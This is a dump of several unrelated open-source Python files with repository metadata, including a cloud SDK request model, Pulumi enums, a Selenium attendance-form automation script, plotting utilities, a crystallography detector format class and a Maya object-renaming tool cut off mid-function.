:return: The region_code of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._region_code
@region_code.setter
def region_code(self, region_code):
"""Sets the region_code of this GetAccessControlGroupListRequest.
REGION코드 # noqa: E501
:param region_code: The region_code of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._region_code = region_code
@property
def access_control_group_no_list(self):
"""Gets the access_control_group_no_list of this GetAccessControlGroupListRequest. # noqa: E501
ACG번호리스트 # noqa: E501
:return: The access_control_group_no_list of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: list[str]
"""
return self._access_control_group_no_list
@access_control_group_no_list.setter
def access_control_group_no_list(self, access_control_group_no_list):
"""Sets the access_control_group_no_list of this GetAccessControlGroupListRequest.
ACG번호리스트 # noqa: E501
:param access_control_group_no_list: The access_control_group_no_list of this GetAccessControlGroupListRequest. # noqa: E501
:type: list[str]
"""
self._access_control_group_no_list = access_control_group_no_list
@property
def access_control_group_name(self):
"""Gets the access_control_group_name of this GetAccessControlGroupListRequest. # noqa: E501
ACG이름 # noqa: E501
:return: The access_control_group_name of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._access_control_group_name
@access_control_group_name.setter
def access_control_group_name(self, access_control_group_name):
"""Sets the access_control_group_name of this GetAccessControlGroupListRequest.
ACG이름 # noqa: E501
:param access_control_group_name: The access_control_group_name of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._access_control_group_name = access_control_group_name
@property
def access_control_group_status_code(self):
"""Gets the access_control_group_status_code of this GetAccessControlGroupListRequest. # noqa: E501
ACG상태코드 # noqa: E501
:return: The access_control_group_status_code of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._access_control_group_status_code
@access_control_group_status_code.setter
def access_control_group_status_code(self, access_control_group_status_code):
"""Sets the access_control_group_status_code of this GetAccessControlGroupListRequest.
ACG상태코드 # noqa: E501
:param access_control_group_status_code: The access_control_group_status_code of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._access_control_group_status_code = access_control_group_status_code
@property
def page_no(self):
"""Gets the page_no of this GetAccessControlGroupListRequest. # noqa: E501
페이지번호 # noqa: E501
:return: The page_no of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: int
"""
return self._page_no
@page_no.setter
def page_no(self, page_no):
"""Sets the page_no of this GetAccessControlGroupListRequest.
페이지번호 # noqa: E501
:param page_no: The page_no of this GetAccessControlGroupListRequest. # noqa: E501
:type: int
"""
self._page_no = page_no
@property
def page_size(self):
"""Gets the page_size of this GetAccessControlGroupListRequest. # noqa: E501
페이지사이즈 # noqa: E501
:return: The page_size of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: int
"""
return self._page_size
@page_size.setter
def page_size(self, page_size):
"""Sets the page_size of this GetAccessControlGroupListRequest.
페이지사이즈 # noqa: E501
:param page_size: The page_size of this GetAccessControlGroupListRequest. # noqa: E501
:type: int
"""
self._page_size = page_size
@property
def vpc_no(self):
"""Gets the vpc_no of this GetAccessControlGroupListRequest. # noqa: E501
VPC번호 # noqa: E501
:return: The vpc_no of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._vpc_no
@vpc_no.setter
def vpc_no(self, vpc_no):
"""Sets the vpc_no of this GetAccessControlGroupListRequest.
VPC번호 # noqa: E501
:param vpc_no: The vpc_no of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._vpc_no = vpc_no
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetAccessControlGroupListRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 32.271429
| 204
| 0.64907
|
6e6062bfb8d0710c5152d45b7b793375fbde4f05
| 291
|
py
|
Python
|
molssi_math/string_util.py
|
arefnel/sermacs-workshop
|
f53ced2796d450c58f4fbb545259cd3e8552244e
|
[
"BSD-3-Clause"
] | null | null | null |
molssi_math/string_util.py
|
arefnel/sermacs-workshop
|
f53ced2796d450c58f4fbb545259cd3e8552244e
|
[
"BSD-3-Clause"
] | null | null | null |
molssi_math/string_util.py
|
arefnel/sermacs-workshop
|
f53ced2796d450c58f4fbb545259cd3e8552244e
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Misc. string processing functions
"""
def title_case(sentence):
"""
:param sentence:
sentence tp be converted
:return: ret: string
:example: >>> titlecase("This iS tHe")
This Is The
"""
return ' '.join([i.capitalize() for i in sentence.split()])
| 20.785714
| 63
| 0.594502
|
83da56c44018c7e5882deae9eb874f2a960b23b7
| 1,177
|
py
|
Python
|
sdk/python/pulumi_aws_native/ivs/_enums.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/ivs/_enums.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/ivs/_enums.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'ChannelLatencyMode',
'ChannelType',
'RecordingConfigurationState',
'RecordingConfigurationThumbnailConfigurationRecordingMode',
]
class ChannelLatencyMode(str, Enum):
"""
Channel latency mode.
"""
NORMAL = "NORMAL"
LOW = "LOW"
class ChannelType(str, Enum):
"""
Channel type, which determines the allowable resolution and bitrate. If you exceed the allowable resolution or bitrate, the stream probably will disconnect immediately.
"""
STANDARD = "STANDARD"
BASIC = "BASIC"
class RecordingConfigurationState(str, Enum):
"""
Recording Configuration State.
"""
CREATING = "CREATING"
CREATE_FAILED = "CREATE_FAILED"
ACTIVE = "ACTIVE"
class RecordingConfigurationThumbnailConfigurationRecordingMode(str, Enum):
"""
Thumbnail Recording Mode, which determines whether thumbnails are recorded at an interval or are disabled.
"""
INTERVAL = "INTERVAL"
DISABLED = "DISABLED"
| 25.586957
| 172
| 0.697536
|
7022b3dae4ba45d026c89e12469b39297be93341
| 7,920
|
py
|
Python
|
kincone/kincone.py
|
rozeroze/kincone-send-attendance
|
be7d3305722d98d5769e7e281308ce81ac7566d6
|
[
"MIT"
] | null | null | null |
kincone/kincone.py
|
rozeroze/kincone-send-attendance
|
be7d3305722d98d5769e7e281308ce81ac7566d6
|
[
"MIT"
] | null | null | null |
kincone/kincone.py
|
rozeroze/kincone-send-attendance
|
be7d3305722d98d5769e7e281308ce81ac7566d6
|
[
"MIT"
] | null | null | null |
import sys
import csv
import time
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
LOGIN_URL = "https://kincone.com/auth/login"
LOGOUT_URL = "https://kincone.com/auth/logout"
CONFIGFILE = "/kincone/.kincone.user"
ATTENDANCEFILE = "/kincone/attendance.csv"
SCREENSHOT = "/kincone/snap/"
TITLES = ["編集済みです"]
email = None
password = None
attendances = []
class Browser:
driver = None
def __init__(self):
pass
def open():
pass
class Attendance:
def data_load(self, data):
self.overwrite = data[0]
self.date = data[1]
self.start_hours = data[2]
self.end_hours = data[3]
self.outing_out_hours = data[4]
self.outing_in_hours = data[5]
self.note = data[6]
def set_id(self, data_id):
self.id = data_id
OPT = Options()
OPT.add_argument('-headless')
def load_userconf():
global email
global password
with open(CONFIGFILE, mode = "r") as f:
lines = f.read().splitlines()
for line in lines:
[lhs, rhs] = line.split("=")
if lhs == "email":
email = rhs
elif lhs == "password":
password = rhs
def load_attendances():
global attendances
with open(ATTENDANCEFILE, mode = "r") as f:
reader = csv.reader(f)
lines = [row for row in reader]
attendances = lines[1:] # no-header
def get_current_window_size(driver):
print("log: call get_current_window_size(driver)")
w = driver.execute_script('return document.body.scrollWidth')
h = driver.execute_script('return document.body.scrollHeight')
driver.set_window_size(w, h)
def make_snap(driver, name):
print("log: call make_snap(driver, name)")
driver.save_screenshot(SCREENSHOT + name)
print("log: -> " + SCREENSHOT + name)
def kincone_open(driver):
print("log: call kicone_open(driver)")
driver.get(LOGIN_URL)
def kincone_login(driver):
print("log: call kincone_login(driver)")
form = driver.find_element_by_css_selector("#content > div.container > div > div > div.col-sm-4.col-sm-offset-4 > div > form")
form.find_element_by_id("email").send_keys(email)
form.find_element_by_id("password").send_keys(password)
form.find_element_by_css_selector("div.clearfix.form-group > div.pull-right > input").click()
def kincone_logout(driver):
print("log: call kincone_logout(driver)")
driver.get(LOGOUT_URL)
def kincone_get_data_id(driver, attendance):
print("log: call kincone_get_data_id(driver, attendance)")
row_id = "attendance-row-{0}".format(attendance.date)
data_id = driver.find_element_by_css_selector("#{0} .delete-button".format(row_id)).get_attribute("data-id")
return data_id
def kincone_is_data_exists(driver, attendance):
print("log: call kincone_is_data_exists(driver, attendance)")
row_id = "attendance-row-{0}".format(attendance.date)
title = driver.find_element_by_id(row_id).get_attribute("title")
for t in TITLES:
if t == title:
return True
return False
def kincone_remove_attendance(driver, attendance):
print("log: call kincone_remove_attendance(driver, attendance)")
# display remove-dialog
row_id = "attendance-row-{0}".format(attendance.date)
#driver.execute_script("document.querySelector('#{0}').scrollIntoView()".format(row_id))
#driver.find_element_by_css_selector("#{0} .delete-button".format(row_id)).click()
driver.execute_script("document.querySelector('#{0} .delete-button').click()".format(row_id))
time.sleep(5)
make_snap(driver, "open-remove-dialog.png")
# send delete
form = driver.find_element_by_css_selector("#content > div.container > div > div.modal.fade.bs-delete-modal-sm > div > div > div.modal-footer > form")
#form.find_element_by_id("id").send_keys(attendance.id)
form.submit()
time.sleep(5)
def kincone_open_attendance(driver, attendance):
print("log: call kincone_open_attendance(driver, attendance)")
url = "https://kincone.com/attendance/edit/{0}".format(attendance.id)
print("log: in-edit: open url -> {0}".format(url))
driver.get(url)
# hour
def kincone_edit_attendance_hour(driver, attendance):
print("log: call kincone_edit_attendance_hour(driver, attendance)")
driver.find_element_by_id("start_hours").send_keys(attendance.start_hours)
driver.find_element_by_css_selector("#outings > button").click()
driver.find_element_by_id("out_hours_0").send_keys(attendance.outing_out_hours)
driver.find_element_by_id("in_hours_0").send_keys(attendance.outing_in_hours)
driver.find_element_by_id("end_hours").send_keys(attendance.end_hours)
# flag
def kincone_edit_attendance_flags(driver, attendance):
print("log: call kincone_edit_attendance_flags(driver, attendance)")
# note: be all checkboxes out
section = driver.find_element_by_css_selector("#form-attendance-edit > div:nth-child(7)")
checkboxes = section.find_elements_by_css_selector("input[type=checkbox]:checked")
for checkbox in checkboxes:
checkbox.click()
# note
def kincone_edit_attendance_note(driver, attendance):
print("log: call kincone_edit_attendance_note(driver, attendance)")
driver.find_element_by_id("note").send_keys(attendance.note)
# submit
def kincone_submit_attendance(driver, attendance):
print("log: call kincone_submit_attendance(driver, attendance)")
# edit-page submit ( to confirm-page )
driver.find_element_by_css_selector("#form-attendance-edit > div:nth-child(11) > div:nth-child(2) > button").click()
# confirm-page submit
driver.find_element_by_css_selector("#form-attendance-confirm > div:nth-child(13) > div:nth-child(2) > button").click()
def kincone_edit_attendance(driver, attendance):
print("log: call kincone_edit_attendance(driver, attendance)")
try:
#driver = webdriver.Firefox(options=OPT)
atndriver = driver
print("log: in-edit: webdriver start")
kincone_open_attendance(atndriver, attendance)
make_snap(atndriver, "attendance-{0}-opened.png".format(attendance.date))
kincone_edit_attendance_hour(atndriver, attendance)
kincone_edit_attendance_flags(atndriver, attendance)
kincone_edit_attendance_note(atndriver, attendance)
make_snap(atndriver, "attendance-{0}-pre-submit.png".format(attendance.date))
kincone_submit_attendance(atndriver, attendance)
make_snap(atndriver, "attendance-{0}-post-submit.png".format(attendance.date))
except Exception as e:
print(e)
finally:
atndriver.quit()
print("log: in-edit: webdriver quit")
def main():
print("log: call main()")
try:
driver = webdriver.Firefox(options=OPT)
print("log: webdriver start")
driver.implicitly_wait(10)
print("log: webdriver set implicitly_wait -> 10")
kincone_open(driver)
get_current_window_size(driver)
kincone_login(driver)
make_snap(driver, "login.png")
load_attendances()
print("log: load attendance file")
for attendance in attendances:
print("log: data ->", attendance)
atn = Attendance()
atn.data_load(attendance)
data_id = kincone_get_data_id(driver, atn)
atn.set_id(data_id)
print("log: id ->", atn.id)
if (atn.overwrite == "1" and kincone_is_data_exists(driver, atn)):
print("log: overwrite is true and data exists, try remove")
kincone_remove_attendance(driver, atn)
kincone_edit_attendance(driver, atn)
break # test: one pattern
kincone_logout(driver)
make_snap(driver, "logout.png")
except Exception as e:
print(e)
finally:
driver.quit()
print("log: webdriver quit")
if __name__ == '__main__':
main()
| 38.076923
| 154
| 0.687247
|
734510a5332c945e529a61282c8a272e26d20db1
| 3,747
|
py
|
Python
|
visualize.py
|
leilimaster/DmifNet
|
cad50bb7a3762745f72b2498c2eef5ad5b21e4c6
|
[
"MIT"
] | 25
|
2020-07-24T08:24:09.000Z
|
2022-02-22T07:08:54.000Z
|
dmifnet/utils/visualize.py
|
leilimaster/DmifNet
|
cad50bb7a3762745f72b2498c2eef5ad5b21e4c6
|
[
"MIT"
] | 2
|
2021-01-28T09:54:02.000Z
|
2021-02-02T09:08:11.000Z
|
dmifnet/visualize.py
|
leilimaster/DmifNet
|
cad50bb7a3762745f72b2498c2eef5ad5b21e4c6
|
[
"MIT"
] | 1
|
2021-06-19T08:47:48.000Z
|
2021-06-19T08:47:48.000Z
|
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from torchvision.utils import save_image
import dmifnet.common as common
def visualize_data(data, data_type, out_file):
r''' Visualizes the data with regard to its type.
Args:
data (tensor): batch of data
data_type (string): data type (img, voxels or pointcloud)
out_file (string): output file
'''
if data_type == 'img':
if data.dim() == 3:
data = data.unsqueeze(0)
save_image(data, out_file, nrow=4)
elif data_type == 'voxels':
visualize_voxels(data, out_file=out_file)
elif data_type == 'pointcloud':
visualize_pointcloud(data, out_file=out_file)
elif data_type is None or data_type == 'idx':
pass
else:
raise ValueError('Invalid data_type "%s"' % data_type)
def visualize_voxels(voxels, out_file=None, show=False):
r''' Visualizes voxel data.
Args:
voxels (tensor): voxel data
out_file (string): output file
show (bool): whether the plot should be shown
'''
# Use numpy
voxels = np.asarray(voxels)
# Create plot
fig = plt.figure()
ax = fig.gca(projection=Axes3D.name)
voxels = voxels.transpose(2, 0, 1)
ax.voxels(voxels, edgecolor='k')
ax.set_xlabel('Z')
ax.set_ylabel('X')
ax.set_zlabel('Y')
ax.view_init(elev=30, azim=45)
if out_file is not None:
plt.savefig(out_file)
if show:
plt.show()
plt.close(fig)
def visualize_pointcloud(points, normals=None,
out_file=None, show=False):
r''' Visualizes point cloud data.
Args:
points (tensor): point data
normals (tensor): normal data (if existing)
out_file (string): output file
show (bool): whether the plot should be shown
'''
# Use numpy
points = np.asarray(points)
# Create plot
fig = plt.figure()
ax = fig.gca(projection=Axes3D.name)
ax.scatter(points[:, 2], points[:, 0], points[:, 1])
if normals is not None:
ax.quiver(
points[:, 2], points[:, 0], points[:, 1],
normals[:, 2], normals[:, 0], normals[:, 1],
length=0.1, color='k'
)
ax.set_xlabel('Z')
ax.set_ylabel('X')
ax.set_zlabel('Y')
ax.set_xlim(-0.5, 0.5)
ax.set_ylim(-0.5, 0.5)
ax.set_zlim(-0.5, 0.5)
ax.view_init(elev=30, azim=45)
if out_file is not None:
plt.savefig(out_file)
if show:
plt.show()
plt.close(fig)
def visualise_projection(
self, points, world_mat, camera_mat, img, output_file='out.png'):
r''' Visualizes the transformation and projection to image plane.
The first points of the batch are transformed and projected to the
respective image. After performing the relevant transformations, the
visualization is saved in the provided output_file path.
Arguments:
points (tensor): batch of point cloud points
world_mat (tensor): batch of matrices to rotate pc to camera-based
coordinates
camera_mat (tensor): batch of camera matrices to project to 2D image
plane
img (tensor): tensor of batch GT image files
output_file (string): where the output should be saved
'''
points_transformed = common.transform_points(points, world_mat)
points_img = common.project_to_camera(points_transformed, camera_mat)
pimg2 = points_img[0].detach().cpu().numpy()
image = img[0].cpu().numpy()
plt.imshow(image.transpose(1, 2, 0))
plt.plot(
(pimg2[:, 0] + 1)*image.shape[1]/2,
(pimg2[:, 1] + 1) * image.shape[2]/2, 'x')
plt.savefig(output_file)
| 31.754237
| 76
| 0.622365
|
1c2e829f76a0ecd0a9354921fb8cf2b2cf7783c3
| 447
|
py
|
Python
|
tools/python/boutiques/tests/test_pprint.py
|
jerdra/boutiques
|
f6ee252fd1332ec686dc76dc12e52a0d69c685c3
|
[
"MIT"
] | null | null | null |
tools/python/boutiques/tests/test_pprint.py
|
jerdra/boutiques
|
f6ee252fd1332ec686dc76dc12e52a0d69c685c3
|
[
"MIT"
] | null | null | null |
tools/python/boutiques/tests/test_pprint.py
|
jerdra/boutiques
|
f6ee252fd1332ec686dc76dc12e52a0d69c685c3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import os.path as op
from unittest import TestCase
from boutiques import __file__ as bfile
from six import string_types
import boutiques as bosh
class TestPPrint(TestCase):
def test_doesntcrash(self):
fil = op.join(op.split(bfile)[0],
'schema/examples/test_pretty_print.json')
prettystring = bosh.prettyprint(fil)
assert(isinstance(prettystring, string_types))
| 24.833333
| 63
| 0.711409
|
e6cc5e97ef57b1d175d4270bfd16a5e8c96e6c89
| 671
|
py
|
Python
|
melange/messaging/event_message.py
|
mangeld/melange
|
1650268b312f3fea7b26afa2fc8ea4f8dd3948e3
|
[
"MIT"
] | null | null | null |
melange/messaging/event_message.py
|
mangeld/melange
|
1650268b312f3fea7b26afa2fc8ea4f8dd3948e3
|
[
"MIT"
] | null | null | null |
melange/messaging/event_message.py
|
mangeld/melange
|
1650268b312f3fea7b26afa2fc8ea4f8dd3948e3
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from marshmallow import Schema, fields
class EventSchema(Schema):
event_type_name = fields.Str()
occurred_on = fields.DateTime()
class EventMessage:
# A constant that subscriber can use in their "listens_to" events to
# tell they are interested in all the events that happen on their topic
ALL = 'ALL'
event_type_name = 'Default'
def __init__(self, occurred_on=datetime.now()):
self.occurred_on = occurred_on
self.event_type_name = self.event_type_name
def get_occurred_on(self):
return self.occurred_on
def get_event_type_name(self):
return self.event_type_name
| 23.964286
| 75
| 0.716841
|
08fd49debdad2f1475799e1ba87d36097c8c2d0a
| 3,299
|
py
|
Python
|
src/dxtbx/format/FormatCBFMiniEigerDLS16MSN160.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 3
|
2019-08-16T05:46:29.000Z
|
2020-09-18T08:38:37.000Z
|
src/dxtbx/format/FormatCBFMiniEigerDLS16MSN160.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 448
|
2019-04-06T01:20:56.000Z
|
2022-03-31T15:58:48.000Z
|
src/dxtbx/format/FormatCBFMiniEigerDLS16MSN160.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 10
|
2019-04-08T13:30:32.000Z
|
2021-09-30T14:48:50.000Z
|
import sys
import libtbx
from scitbx.array_family import flex
from dxtbx.format.FormatCBFMiniEiger import FormatCBFMiniEiger
from dxtbx.masking import GoniometerMaskerFactory
class FormatCBFMiniEigerDLS16MSN160(FormatCBFMiniEiger):
@staticmethod
def understand(image_file):
"""Check to see if this format class can understand the image file.
Args:
image_file (str): The file path of the image file to check.
Returns:
bool: Returns ``True`` if the image_file is understood by this format class,
else returns ``False``.
"""
# this depends on DIALS for the goniometer shadow model; if missing
# simply return False
header = FormatCBFMiniEiger.get_cbf_header(image_file)
for record in header.split("\n"):
if (
"# detector" in record.lower()
and "eiger" in record.lower()
and "S/N 160-0001" in header
):
return True
return False
@staticmethod
def has_dynamic_shadowing(**kwargs):
dynamic_shadowing = kwargs.get("dynamic_shadowing", False)
if dynamic_shadowing in (libtbx.Auto, "Auto"):
return True
return dynamic_shadowing
def __init__(self, image_file, **kwargs):
"""Initialise the image structure from the given file."""
self._dynamic_shadowing = self.has_dynamic_shadowing(**kwargs)
super().__init__(image_file, **kwargs)
def _goniometer(self):
"""Return a model for a multi-axis goniometer.
This should be checked against the image header, though for miniCBF
there are limited options for this.
Returns:
dxtbx.model.Goniometer.MultiAxisGoniometer: The goniometer model for
this detector.
"""
if "Phi" in self._cif_header_dictionary:
phi = float(self._cif_header_dictionary["Phi"].split()[0])
else:
phi = 0.0
if "Chi" in self._cif_header_dictionary:
chi = float(self._cif_header_dictionary["Chi"].split()[0])
else:
chi = 0.0
if "Omega" in self._cif_header_dictionary:
omega = float(self._cif_header_dictionary["Omega"].split()[0])
else:
omega = 0.0
phi_axis = (1, 0, 0)
chi_axis = (0, 0, -1)
omega_axis = (1, 0, 0)
axes = flex.vec3_double((phi_axis, chi_axis, omega_axis))
angles = flex.double((phi, chi, omega))
names = flex.std_string(("GON_PHI", "GON_CHI", "GON_OMEGA"))
return self._goniometer_factory.make_multi_axis_goniometer(
axes, angles, names, scan_axis=2
)
def get_goniometer_shadow_masker(self, goniometer=None):
if goniometer is None:
goniometer = self.get_goniometer()
assert goniometer is not None
if goniometer.get_names()[1] == "GON_CHI":
# SmarGon
return GoniometerMaskerFactory.smargon(goniometer)
else:
raise ValueError(
"Don't understand this goniometer: %s" % list(goniometer.get_names())
)
if __name__ == "__main__":
for arg in sys.argv[1:]:
print(FormatCBFMiniEigerDLS16MSN160.understand(arg))
| 30.546296
| 86
| 0.615035
|
6d3e1ca2142ee69c7ac166b245e16685c4a13346
| 31,069
|
py
|
Python
|
programs/maya/scripts/naming.py
|
nicklovin/pipeline
|
4d8e042783321e5b0ed7b8a713a7db4d2cef9adb
|
[
"BSD-2-Clause"
] | null | null | null |
programs/maya/scripts/naming.py
|
nicklovin/pipeline
|
4d8e042783321e5b0ed7b8a713a7db4d2cef9adb
|
[
"BSD-2-Clause"
] | null | null | null |
programs/maya/scripts/naming.py
|
nicklovin/pipeline
|
4d8e042783321e5b0ed7b8a713a7db4d2cef9adb
|
[
"BSD-2-Clause"
] | null | null | null |
import maya.cmds as cmds
import pymel.core as pm
from string import ascii_uppercase
from functools import partial
from PySide2 import QtWidgets, QtCore, QtGui
import Splitter
from maya_tools.contexts.undoContext import UndoContext
LETTERS_INDEX = {index: letter for index, letter in
enumerate(ascii_uppercase, start=1)}
def get_short_name(longname):
"""
Returns the shortname of an input object.
"""
return longname.rsplit('|', 1)[-1]
def get_long_name(name):
"""
Returns the longname of an object.
"""
return cmds.ls(name, long=True)[0]
# TODO: Kwargs: numeric_index, start_number?, upper_case, end_name,
# TODO: name_list should be required and renamed
def list_renamer(new_name, numeric_index=True, start_number=1,
upper_case=True, end_name=False, name_list=[]):
"""
Renamer tool for renaming lists of objects. Default works based off
selection, but can take a list parameter when function is passed with larger
tools and functions.
Args:
new_name (str): Name to assign to object list. Must include at least
one '#'.
numeric_index (bool): Assign numeric values to the padding of renamed
objects in the list. If false, uses alphanumeric.
start_number (int): Assign starting index for the numeric renaming. In
alphanumeric, it will apply to the corresponding letter position.
(ex. 2 = 'B')
upper_case (bool): Assign alphabet identifier as uppercase or lowercase.
end_name (bool): Assign if the last object in the list should have the
numeric value replaced with 'END'.
name_list (list[str]): Assign the function to perform based on a list
input not limited to selection. Only active when selection argument
is False.
Returns:
(list): List of all the newly named nodes.
"""
if name_list:
# ensure pymel nodes
name_list = pm.ls(name_list)
else:
name_list = pm.ls(selection=True)
index_start = max(0, start_number)
if '#' not in new_name:
# Give this a proper error
raise KeyError('Could not find any "#" in name.')
number_padding = new_name.count('#')
new_name_list = []
# Numeric renaming
if numeric_index:
name_replace = new_name.replace(
('#' * number_padding), '%0{pad}d'.format(pad=number_padding))
index = index_start
for i in name_list:
i.rename(name_replace % index)
new_name_list.append(i.name())
index += 1
# Alphanumeric renaming
else:
name_replace = new_name.replace(('#' * number_padding), '%s')
# If index is not 0, the index will be changed to start letters at
# appropriate alphanumeric count
if index_start > 0:
index = index_start
else:
index = 1
if name_list > 26:
pass
# index[27] == 'aa'
letter_index = None
overlap_count = 0
for i in name_list:
# Remainder division (not substitution)
continuous_index = index % 27
if continuous_index < index:
overlap_count = overlap_count + 1
letter_index = LETTERS_INDEX[overlap_count]
index = 1
if letter_index:
if upper_case:
alpha_index = letter_index + LETTERS_INDEX[index]
else:
alpha_index = letter_index.lower() \
+ str(LETTERS_INDEX[index]).lower()
else:
if upper_case:
alpha_index = LETTERS_INDEX[index]
else:
alpha_index = str(LETTERS_INDEX[index]).lower()
i.rename(name_replace % alpha_index)
new_name_list.append(i.name())
index += 1
# After indexes are all named, check if last object should be an 'end'
if end_name:
name_parts = new_name.split('#')
end_name = '{pre}END{post}'.format(pre=name_parts[0], post=name_parts[-1])
endNode = pm.ls(new_name_list[-1])[0]
endNode.rename(end_name)
new_name_list[-1] = endNode.name()
return new_name_list
# TODO: add/replace/remove changed to method, made required
# TODO: name_list made required
def set_prefix(input_prefix='', add=False, replace=False, remove=False,
name_list=[]):
"""
Prefix setting tool. Allows for a prefix to be added, replaced, or removed
based on user input. Users must declare one of the Procedure Type Arguments
to be True, and leave the other two as False for the function to run.
Default works based off selection, but can take a list parameter when
function is passed with larger tools and functions.
Args:
input_prefix (str): Assign the string value to add as a prefix.
Procedure Type Arguments:
add (bool): Assign the function to add a new prefix
replace (bool): Assign the function to replace an existing prefix
remove (bool): Assign the function to remove an existing prefix.
name_list (list[str]): Allows for a provided list to be performed on.
Only works if selection flag is False.
"""
if (add and replace) or (add and remove) or (replace and remove):
raise KeyError('Can only set one type flag at a time! Use only one of'
' the following: add, replace, remove.')
if not add and not replace and not remove:
raise KeyError('No argument specified for the function to perform! Set a '
'value of True to one of the following: add, replace, '
'remove.')
if name_list:
# ensure pymel nodes
name_list = pm.ls(name_list)
else:
name_list = pm.ls(selection=True)
name_return_list = []
if input_prefix.endswith('_'):
input_prefix = input_prefix[:-1]
if add:
if input_prefix == '':
raise KeyError('No prefix given!')
for i in name_list:
short_i = get_short_name(i)
if i.startswith('_'):
i.rename('%s_%s' % (input_prefix, i[1:]))
else:
i.rename('%s_%s' % (input_prefix, short_i))
name_return_list.append(i.name())
return name_return_list
if replace:
if input_prefix == '':
raise KeyError('No prefix given!')
for obj in name_list:
if obj.startswith('_'):
obj.rename(input_prefix + obj)
else:
name_parts = obj.split('_')
obj.rename('_'.join([input_prefix] + name_parts[1:]))
name_return_list.append(obj.name())
return name_return_list
if remove:
for obj in name_list:
if obj.startswith('_'):
obj.rename(obj[1:])
name_return_list.append(obj.name())
else:
name_parts = obj.split('_')
obj.rename('_'.join(name_parts[1:]))
name_return_list.append(obj.name())
return name_return_list
# TODO: add/replace/remove changed to method, made required
# TODO: name_list made required
def set_suffix(input_suffix, add=True, replace=False, remove=False,
name_list=[]):
"""
Prefix setting tool. Allows for a suffix to be added, replaced, or removed
based on user input. Users must declare one of the Procedure Type Arguments
to be True, and leave the other two as False for the function to run.
Default works based off selection, but can take a list parameter when
function is passed with larger tools and functions.
Args:
input_suffix (str): Assign the string value to add as a suffix.
Procedure Type Arguments:
add (bool): Assign the function to add a new suffix
replace (bool): Assign the function to replace an existing suffix
remove (bool): Assign the function to remove an existing suffix.
name_list (list[str]): Allows for a provided list to be performed on.
Only works if selection flag is False.
"""
if (add and replace) or (add and remove) or (replace and remove):
pm.error('Can only set one type flag at a time! Use only one of'
' the following: add, replace, remove.')
if not add and not replace and not remove:
pm.error('No argument specified for the function to perform! Set a '
'value of True to one of the following: add, replace, '
'remove.')
if name_list:
# ensure pymel nodes
name_list = pm.ls(name_list)
else:
name_list = pm.ls(selection=True)
name_return_list = []
if input_suffix.startswith('_'):
input_suffix = input_suffix[1:]
if add:
if input_suffix == '':
raise KeyError('No suffix given!')
for obj in name_list:
if obj.endswith('_'):
obj.rename('%s%s' % (obj, input_suffix))
else:
obj.rename('%s_%s' % (obj, input_suffix))
name_return_list.append(obj.name())
return name_return_list
if replace:
if input_suffix == '':
raise KeyError('No suffix given!')
for obj in name_list:
if obj.endswith('_'):
obj.rename(obj, obj + input_suffix)
else:
name_parts = obj.split('_')
obj.rename('_'.join(name_parts[:-1] + [input_suffix]))
name_return_list.append(obj.name())
return name_return_list
if remove:
for obj in name_list:
if obj.endswith('_'):
obj.rename(obj[:-1])
name_return_list.append(obj.name())
else:
name_parts = obj.split('_')
obj.rename('_'.join(name_parts[:-1]))
name_return_list.append(obj.name())
return name_return_list
# Make this work, long and short names cause hell
def search_replace_name(search_input, replace_output, hierarchy=False,
input_objects=[]):
"""
Python equivalent of the mel searchReplaceNames procedure. Created to work
with GUIs and python-written scripts.
Args:
search_input (str): String to search for that will be replaced.
replace_output (str): String used to replace the input string.
hierarchy (bool): Declare the range/scope of the procedure to use all
objects in hierarchy instead of just selection.
